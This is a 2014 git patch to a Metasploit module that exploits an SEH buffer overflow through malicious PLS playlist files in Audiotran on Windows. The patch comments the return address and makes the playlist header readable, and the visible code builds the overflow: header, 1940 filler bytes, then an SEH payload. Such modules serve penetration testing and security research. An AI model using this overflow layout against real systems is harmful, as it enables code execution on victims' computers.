From 98958bc7bc019b3a93deed71a59ffd111ef16f73 Mon Sep 17 00:00:00 2001 From: Philip OKeefe Date: Mon, 17 Feb 2014 13:40:03 -0500 Subject: [PATCH] Making audiotran_pls_1424 more readable and adding comments --- modules/exploits/windows/fileformat/audiotran_pls_1424.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/fileformat/audiotran_pls_1424.rb b/modules/exploits/windows/fileformat/audiotran_pls_1424.rb index 8e89c07ef5..038ba05fb4 100644 --- a/modules/exploits/windows/fileformat/audiotran_pls_1424.rb +++ b/modules/exploits/windows/fileformat/audiotran_pls_1424.rb @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows Universal', { 'Ret' => 0x1001cd67 } ], #p/p/r + [ 'Windows Universal', { 'Ret' => 0x1001cd67 } ], #p/p/r from amp3dj.ocx ], 'Privileged' => false, 'DefaultTarget' => 0)) @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - sploit = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0D\x0A\x46\x69\x6C\x65\x31\x3D" + sploit = "[playlist]\r\nFile1=" sploit << rand_text_alpha_upper(1940) sploit << generate_seh_payload(target.ret) print_status("Creating '#{datastore['FILENAME']}' file ...")